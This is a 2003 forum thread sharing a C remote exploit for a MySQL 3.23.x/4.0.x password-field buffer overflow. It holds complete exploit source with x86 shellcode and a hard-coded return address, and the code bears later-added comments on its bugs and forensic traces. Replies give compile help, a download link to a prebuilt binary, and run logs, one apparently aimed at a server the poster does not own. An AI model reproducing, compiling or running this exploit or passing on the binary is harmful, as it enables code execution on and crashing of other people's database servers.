Forums: Mysql 3.23.x/4.0.x Remote Root Exploit - Forums


Mysql 3.23.x/4.0.x Remote Root Exploit :)

#1 User is offline   woutiir 

  • Corporal
  • Group: Specialist
  • Posts: 161
  • Joined: 31-July 03

Posted 14 September 2003 - 05:12 AM

Most ppl will be damn happy to see this one..

It says PoC (proof of concept), but if you ask me their shellcode is right and it should just work; it's a PoC because it's proof that it's working. So he kind of mixed up the term. Anyhow, enjoy it!

I will :D


Mysql 3.23.x/4.0.x Remote Root Exploit
 

/* Mysql 3.23.x/4.0.x remote exploit
* proof of concept
* using jmp *eax
* bkbll (bkbll cnhonker.net,bkbll tom.com) 2003/09/12
* compile:gcc -o mysql mysql.c -L/usr/lib/mysql -lmysqlclient
* DO NOT DISTRIBUTE IT
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/select.h>
#include <netdb.h>
#include <mysql/mysql.h>

/* Tunables and the strings sent to the server.  Everything here is fixed at
 * compile time; only the host and the root password come from the command line. */
#define PAD 19*4*2
/* ^ 152; unparenthesised, so only safe in the additive contexts main() uses it in */
#define JMPADDR 0x42125b2b
/* ^ hard-coded address, duplicated in targets[0].ret; main() uses this macro and never reads targets[], so -t only validates */
#define ROOTUSER "root"
/* ^ the tool logs in as root: valid root credentials are a precondition for everything below */
#define PORT 3306
#define MYDB "mysql"
#define ALTCOLUMSQL "ALTER TABLE user CHANGE COLUMN Password Password LONGTEXT"
/* ^ schema change on mysql.user issued from a root session; nothing in this file reverts it,
 *   so the altered column type survives as a forensic indicator and the statement is visible in query logs */
#define LISTUSERSQL "SELECT user FROM mysql.user WHERE user!='root' OR user='root LIMIT 1,1'"
/* ^ note the quoting: "LIMIT 1,1" sits inside the string literal, so the query has no LIMIT clause and the
 *   second condition only matches a user literally named "root LIMIT 1,1"; which non-root row comes first is
 *   whatever the server returns first */
#define FLUSHSQL "\x11\x00\x00\x00\x03\x66\x6C\x75\x73\x68\x20\x70\x72\x69\x76\x69\x6C\x65\x67\x65\x73"
/* ^ looks like a pre-built client protocol packet: four header bytes, a command byte, then the ASCII text
 *   "flush privileges".  main() writes it with send() instead of mysql_real_query(); a FLUSH PRIVILEGES
 *   still appears on the wire and in the server's general query log */
#define BUF 1024

MYSQL *conn;        /* the single library connection; sqlerror() closes it on any failure, main() never does on success */
char NOP[]="90";    /* hex text for one x86 NOP; the payload is assembled as hex text, not raw bytes */
/*
char shellcode[]=
"31c031db31c9b002"
"cd8085c0751b4b31"
"d2b007cd8031c0b0"
"40cd8089c331c9b1"
"09b025cd80b001cd"
"80b017cd8031c050"
"405089e331c9b0a2"
"cd80b1e089c883e8"
"0af7d04089c731c0"
"404c89e250505257"
"518d4c240431dbb3"
"0ab066cd805983f8"
"017505803a497409"
"e2d231c04089c3cd"
"8089fbb103b03f49"
"cd8041e2f851686e"
"2f7368682f2f6269"
"89e351682d696c70"
"89e251525389e131"
"d231c0b00bcd8090";
*/
/* Hex text (320 characters) that main() stores, together with the NOP run and
 * JMPADDR, in the Password field of one mysql.user row.  Not decoded here.
 * Detection/forensics: the artefact left on a targeted server is a Password
 * value of 480 hex characters in a column that has been widened to LONGTEXT. */
char shellcode[]=
"db31c03102b0c931"
"c08580cd314b1b74"
"cd07b0d2b0c03180"
"8980cd40b1c931c3"
"cd25b009cd01b080"
"cd17b08050c03180"
"e3895040a2b0c931"
"e0b180cde883c889"
"40d0f70ac031c789"
"e2894c4057525050"
"244c8d51b3db3104"
"cd66b00af8835980"
"800575010974493a"
"c031d2e2cdc38940"
"b1fb8980493fb003"
"e24180cd6e6851f8"
"6868732f69622f2f"
"6851e389706c692d"
"5251e28931e18953"
"b0c031d29080cd0b";

int type=1;   /* 1-based index into targets[], set by -t; main() range-checks it but never uses it (JMPADDR is hard-coded) */
struct
{
 char *os;     /* label printed by usage() */
 u_long ret;   /* printed with %x in usage(), a width mismatch on LP64 platforms */
} targets[] =
     {
          { "glibc-2.2.93-5", 0x42125b2b },
     },v;   /* v is an otherwise unused instance that exists so sizeof(v) can serve as the element size */

void usage(char *);
void sqlerror(char *);
MYSQL *mysqlconn(char *server,int port,char *user,char *pass,char *dbname);

/*
 * Entry point.  As written the program: parses -d/-p/-t, authenticates to the
 * target as "root" through libmysqlclient, widens mysql.user.Password with
 * ALTER TABLE, writes a hex-text payload into one user's Password field,
 * scans its own descriptors for the socket the client library opened, pushes
 * a raw FLUSH PRIVILEGES packet and one out-of-band byte down that socket,
 * then relays stdin/stdout to it.
 *
 * Reviewer notes (defender's view):
 *  - Valid root credentials are a precondition (-p); nothing happens without them.
 *  - Every step before the overflow is an ordinary SQL statement from a root
 *    session (ALTER TABLE on mysql.user, UPDATE of Password, FLUSH PRIVILEGES),
 *    so the sequence is visible in query logs and on the wire, and neither the
 *    schema change nor the 480-character hex Password value is ever reverted.
 *  - The thread's own test reports show the server dying at the OOB send rather
 *    than a shell appearing; the tool is destructive even when it fails.
 *  - Implicit int return type, no return statement, and several width/format
 *    mismatches are flagged inline.  memset/strlen/memcpy are used without
 *    <string.h>; presumably it is reached via mysql.h.
 */
main(int argc,char **argv)
{
    MYSQL_RES *result;
    MYSQL_ROW row;
    char jmpaddress[8];                       /* too small: sprintf("%x") below writes 8 digits + NUL = 9 bytes */
    char buffer[BUF],muser[20],buf2[800];     /* buffer: SQL text and relay buffer; muser: username read back; buf2: hex payload */
    my_ulonglong rslines;
    struct sockaddr_in clisocket;
    int i=0,j,clifd,count,a;                  /* a is unused */
    char data1,c;                             /* c receives getopt()'s int; where char is unsigned, (c != EOF) is always true */
    fd_set fds;
    char *server=NULL,*rootpass=NULL;

    if(argc<3) usage(argv[0]);                /* usage() exits; it never returns here */
    while((c = getopt(argc, argv, "d:t:p:"))!= EOF)
      {
            switch (c)
            {
              case 'd':
                  server=optarg;
                  break;
              case 't':
                  type = atoi(optarg);
                  /* int vs size_t comparison; type is validated here but never used to select a target */
                  if((type > sizeof(targets)/sizeof(v)) || (type < 1))
                       usage(argv[0]);
                  break;
             case 'p':
                  rootpass=optarg;
                   break;
             default:
                  usage(argv[0]);
                  return 1;                   /* unreachable: usage() calls exit() */
              }
          }
          if(server==NULL || rootpass==NULL)
              usage(argv[0]);
    memset(muser,0,20);
    memset(buf2,0,800);
    printf("@-------------------------------------------------@\n");
    printf("#  Mysql 3.23.x/4.0.x remote exploit(2003/09/12)  #\n");
    printf("@ by bkbll(bkbll_at_cnhonker.net,bkbll_at_tom.com @\n");
    printf("---------------------------------------------------\n");
    printf("[+] Connecting to mysql server %s:%d....",server,PORT);
    fflush(stdout);
    /* an authenticated root login through the normal client library */
    conn=mysqlconn(server,PORT,ROOTUSER,rootpass,MYDB);
    if(conn==NULL) exit(0);                   /* every failure path exits with status 0, so a caller cannot tell failure from success */
    printf("ok\n");
    printf("[+] ALTER user column...");
    fflush(stdout);
    /* persistent schema change on mysql.user; nothing below undoes it */
    if(mysql_real_query(conn,ALTCOLUMSQL,strlen(ALTCOLUMSQL))!=0)
        sqlerror("ALTER user table failed");
    //select
    printf("ok\n");
    printf("[+] Select a valid user...");
    fflush(stdout);
    if(mysql_real_query(conn,LISTUSERSQL,strlen(LISTUSERSQL))!=0) 
        sqlerror("select user from table failed");
    printf("ok\n");
    result=mysql_store_result(conn);
    if(result==NULL)
        sqlerror("store result error");
    rslines=mysql_num_rows(result);
    if(rslines==0)
        sqlerror("store result error");
    row=mysql_fetch_row(result);
    snprintf(muser,19,"%s",row[0]);           /* first row in whatever order the server returns; truncated to 19 chars */
    printf("[+] Found a user:%s\n",muser);
    memset(buffer,0,BUF);
    i=sprintf(buffer,"update user set password='");
    /* writes 9 bytes into the 8-byte array, then stores a NUL one past its end */
    sprintf(jmpaddress,"%x",JMPADDR);
    jmpaddress[8]=0;
    /* hex-text payload: NOP text up to PAD-4, a 4-char marker, the 8-digit address,
     * then the shellcode string; with the constants above this totals 480 characters */
    for(j=0;j<PAD-4;j+=2)
    {
        memcpy(buf2+j,NOP,2);
    }
    memcpy(buf2+j,"06eb",4);
    memcpy(buf2+PAD,jmpaddress,8);
    memcpy(buf2+PAD+8,shellcode,strlen(shellcode));
    j=strlen(buf2);
    /* pad with 'A' to a multiple of 8; not taken for the current 480-character layout */
    if(j%8)
    {
        j=j/8+1;
        count=j*8-strlen(buf2);
        memset(buf2+strlen(buf2),'A',count);
    }
    printf("[+] Password length:%d\n",strlen(buf2));   /* %d with a size_t argument; %zu is the matching specifier */
    memcpy(buffer+i,buf2,strlen(buf2));
    i+=strlen(buf2);
    /* muser came back from the server and is interpolated unescaped; a quote in it breaks the statement */
    i+=sprintf(buffer+i,"' where user='%s'",muser);
    mysql_free_result(result);
    printf("[+] Modified password...");
    fflush(stdout);    
    //get result
    //write(2,buffer,i);
    if(mysql_real_query(conn,buffer,i)!=0) 
        sqlerror("Modified password error");
    //here I'll find client socket fd
    printf("ok\n");
    printf("[+] Finding client socket......");
    /* locate the descriptor libmysqlclient opened by matching the peer port; j is an int
     * but getpeername() expects a socklen_t *, which only works where the two share a width */
    j=sizeof(clisocket);
    for(clifd=3;clifd<256;clifd++)
    {
        if(getpeername(clifd,(struct sockaddr *)&clisocket,&j)==-1) continue;
        if(clisocket.sin_port==htons(PORT)) break;
    }
    if(clifd==256)
    {
        printf("FAILED\n[-] Cannot find client socket\n");
        mysql_close(conn);
        exit(0);
    }
    data1='I';
    printf("ok\n");
    printf("[+] socketfd:%d\n",clifd);
    //let server overflow
    printf("[+] Overflow server....");
    fflush(stdout);
    /* raw packet written behind the library's back; sizeof includes the literal's
     * NUL, so 22 bytes go out for a 21-byte packet, and send()'s result is unchecked */
    send(clifd,FLUSHSQL,sizeof(FLUSHSQL),0);
    //if(mysql_real_query(conn,FLUSHSQL,strlen(FLUSHSQL))!=0) 
    //    sqlerror("Flush error");
    printf("ok\n");
      printf("[+] sending OOB.......");
      fflush(stdout);
      /* one urgent byte; the "Connection reset by peer" reported in the thread at this
       * point is consistent with the server having already gone away after the previous packet */
      if(send(clifd,&data1,1,MSG_OOB)<1)
      {
          perror("error");
          mysql_close(conn);
          exit(0);
      }
    printf("ok\r\n");
    printf("[+] Waiting a shell.....");
    fflush(stdout);
    j=0;                                      /* reused as a "first data seen" flag for the relay loop */
    memset(buffer,0,BUF);
      while(1)
    {
        FD_ZERO(&fds);
        FD_SET(0, &fds);
        FD_SET(clifd, &fds);
        
        if (select(clifd+1, &fds, NULL, NULL, NULL) < 0) 
        {
            if (errno == EINTR) continue;
            break;
        }
        if (FD_ISSET(0, &fds)) 
        {
            count = read(0, buffer, BUF);
            if (count <= 0) break;
            if (write(clifd, buffer, count) <= 0) break;
            memset(buffer,0,BUF);
        }
        if (FD_ISSET(clifd, &fds)) 
        {
            count = read(clifd, buffer, BUF);
            if (count <= 0) break;
            if(j==0) printf("Ok\n");
            j=1;
            if (write(1, buffer, count) <= 0) break;
            memset(buffer,0,BUF);
        }
        
    }    
    /* falls off the end without a return value; the library connection is never closed on this path */
}

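/*
 * Print the banner, the option summary and the target table, then exit.
 *
 * @param s  argv[0], echoed in the usage line.
 * Never returns: exits with status 0, as the original did (a non-zero status
 * would be more conventional for a usage error, but callers are left unchanged).
 *
 * Fixes vs. the original: the loop index is size_t so it matches the
 * sizeof-derived element count without a signed/unsigned comparison, and the
 * address is printed with %lx because targets[].ret is u_long (the original
 * %x is a width mismatch on LP64 platforms).
 */
void usage(char *s)
{
    printf("@-------------------------------------------------@\n");
    printf("#  Mysql 3.23.x/4.0.x remote exploit(2003/09/12)  #\n");
    printf("@ by bkbll(bkbll_at_cnhonker.net,bkbll_at_tom.com @\n");
    printf("---------------------------------------------------\n");
    printf("Usage:%s -d <host> -p <root_pass> -t <type>\n",s);
    printf("      -d target host ip/name\n");
    printf("      -p 'root' user paasword\n");
    printf("      -t  type [default:%d]\n",type);
    printf("      ------------------------------\n");
    /* 1-based numbering to match what -t expects */
    for(size_t a = 0; a < sizeof(targets)/sizeof(v); a++)
        printf("         %zu [0x%.8lx]: %s\n", a+1, targets[a].ret, targets[a].os);
    printf("\n");
    exit(0);
}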
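/*
 * Open a libmysqlclient connection.
 *
 * @param server  host name or address
 * @param port    TCP port
 * @param user    account name
 * @param pass    account password
 * @param dbname  default database
 * @return a connected MYSQL handle the caller owns (release with mysql_close),
 *         or NULL after printing a diagnostic.
 *
 * Fixes vs. the original: mysql_error() was called on the NULL handle when
 * mysql_init() failed (a null dereference inside the client library), and the
 * handle allocated by mysql_init() leaked when mysql_real_connect() failed.
 */
MYSQL *mysqlconn(char *server,int port,char *user,char *pass,char *dbname)
{
    MYSQL *connect = mysql_init(NULL);
    if(connect==NULL)
    {
        /* mysql_init(NULL) returns NULL only when it cannot allocate the handle,
         * so there is no handle to ask for an error string */
        printf("FAILED\n[-] init mysql failed: out of memory\n");
        return NULL;
    }
    if(mysql_real_connect(connect,server,user,pass,dbname,port,NULL,0)==NULL)
    {
        printf("FAILED\n[-] Error: %s\n",mysql_error(connect));
        mysql_close(connect);   /* release the handle mysql_init() allocated */
        return NULL;
    }
    return connect;
}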
/*
 * Report a failed query on stderr together with the library's last error
 * text, close the global connection and exit.  Never returns.
 *
 * @param s  short description of the step that failed
 */
void sqlerror(char *s)
{
    const char *detail = mysql_error(conn);
    fprintf(stderr,"FAILED\n[-] %s:%s\n",s,detail);
    mysql_close(conn);
    exit(0);
}

/* woutiir 0wnZ YoU */


Greetings,
woutiir

#2 User is offline   clip 

  • Private First Class
  • Group: Members
  • Posts: 139
  • Joined: 13-September 03

Posted 14 September 2003 - 05:20 AM

printf(" -p 'root' user paasword\n");

you need a valid root password. no?

#3 User is offline   woutiir 

  • Corporal
  • Group: Specialist
  • Posts: 161
  • Joined: 31-July 03

Posted 14 September 2003 - 05:22 AM

nope you can specify the root passwd that you like.
Though I found another problem: mysql/mysql.h isn't included; gonna install mysql now and see if it works. :\

#4 User is offline   clip 

  • Private First Class
  • Group: Members
  • Posts: 139
  • Joined: 13-September 03

Posted 14 September 2003 - 05:25 AM

emerge mysql ;)

#5 User is offline   Buster 

  • Private
  • Group: Members
  • Posts: 8
  • Joined: 22-August 03

Posted 14 September 2003 - 06:06 AM

i tried to compile the exploit, but there were too many errors. i installed mysql but it doesn't work.

#6 User is offline   Yosam 

  • Private First Class
  • Group: Members
  • Posts: 43
  • Joined: 06-September 03

Posted 14 September 2003 - 06:53 AM

where is the header file? ;)

btw, is there a certain port that i should scan for it?

#7 Guest_indiXPerience_*

  • Group: Guests

Posted 14 September 2003 - 06:58 AM

The header files are ok by me.

But the -lmysqlclient parameter is false.
... mysqlclient not found.

Where can I download this file or folder?

But when I try to compile without -lmysqlclient comes many error strings like:
undefined reference to mysql_error
... in function sqlerror
.......


Please help

#8 User is offline   clip 

  • Private First Class
  • Group: Members
  • Posts: 139
  • Joined: 13-September 03

Posted 14 September 2003 - 07:05 AM

install mysql and run


gcc -o msql msql.c -L/usr/local/mysql/lib -lmysqlclient -lz

the exploit dosent work though.

#9 User is offline   Gandulf 

  • Private
  • Group: Members
  • Posts: 2
  • Joined: 19-August 03

Posted 14 September 2003 - 07:06 AM

HI,

MySQL port is 3306, but I think you must have a valid root pass.

Without a pass you get this:

root@hell:/home/daafa> ./mysql -d 127.0.0.1 -p xUPiGiK
@-------------------------------------------------@
# Mysql 3.23.x/4.0.x remote exploit(2003/09/12) #
@ by bkbll(bkbll_at_cnhonker.net,bkbll_at_tom.com @
---------------------------------------------------
[+] Connecting to mysql server 127.0.0.1:3306....FAILED
[-] Error: Can't connect to MySQL server on '127.0.0.1' (111)

with the pass you get this message:

root@hell:/home/daafa> ./mysql -d 127.0.0.1 -p xUPiGiKi
@-------------------------------------------------@
# Mysql 3.23.x/4.0.x remote exploit(2003/09/12) #
@ by bkbll(bkbll_at_cnhonker.net,bkbll_at_tom.com @
---------------------------------------------------
[+] Connecting to mysql server 127.0.0.1:3306....ok
[+] ALTER user column...ok
[+] Select a valid user...ok
[+] Found a user:admin
[+] Password length:480
[+] Modified password...ok
[+] Finding client socket......ok
[+] socketfd:3
[+] Overflow server....ok
[+] sending OOB.......error: Connection reset by peer

so I get no shell or anything else, but now mysql is broken.
I must reinstall the mysql server.

Greets
Gandulf

#10 User is offline   Yosam 

  • Private First Class
  • Group: Members
  • Posts: 43
  • Joined: 06-September 03

Posted 14 September 2003 - 07:10 AM

perhaps you can upload your compiled *.exe file please?

thanks.

#11 User is offline   clip 

  • Private First Class
  • Group: Members
  • Posts: 139
  • Joined: 13-September 03

Posted 14 September 2003 - 07:10 AM

Yup, you need a valid account so it's quite useless.

Quote

CVE Ids : CAN-2003-0780

MySQL, a popular relational database system, contains a buffer overflow condition which could be exploited by a user who has permission to execute "ALTER TABLE" commands on the tables in the "mysql" database. If successfully exploited, this vulnerability could allow the attacker to execute arbitrary code with the privileges of the mysqld process (by default, user "mysql"). Since the "mysql" database is used for MySQL's internal record keeping, by default the mysql administrator "root" is the only user with permission to alter its tables.


#12 Guest_indiXPerience_*

  • Group: Guests

Posted 14 September 2003 - 07:19 AM

Can you post the binary file? (For Linux or Win)

Please

#13 User is offline   clip 

  • Private First Class
  • Group: Members
  • Posts: 139
  • Joined: 13-September 03

Posted 14 September 2003 - 07:26 AM

linux x86 binary:

http://203.177.80.47/images/msql.rar

#14 User is offline   Buster 

  • Private
  • Group: Members
  • Posts: 8
  • Joined: 22-August 03

Posted 14 September 2003 - 08:37 AM

linux:/home/Buster # ./msql -d 195.224.17.200 -p "" -t 1
@-------------------------------------------------@
# Mysql 3.23.x/4.0.x remote exploit(2003/09/12) #
@ by bkbll(bkbll_at_cnhonker.net,bkbll_at_tom.com @
---------------------------------------------------
[+] Connecting to mysql server 195.224.17.200:3306....ok
[+] ALTER user column...ok
[+] Select a valid user...ok
[+] Found a user:
[+] Password length:480
[+] Modified password...ok
[+] Finding client socket......ok
[+] socketfd:3
[+] Overflow server....ok
[+] sending OOB.......ok
[+] Waiting a shell.....linux:/home/Buster

I think this is a fake. The server crashed and I got my shell (I hadn't exploited my server).

#15 Guest_indiXPerience_*

  • Group: Guests

Posted 14 September 2003 - 09:26 AM

I tried the exploit, but I didn't get a shell or anything else.
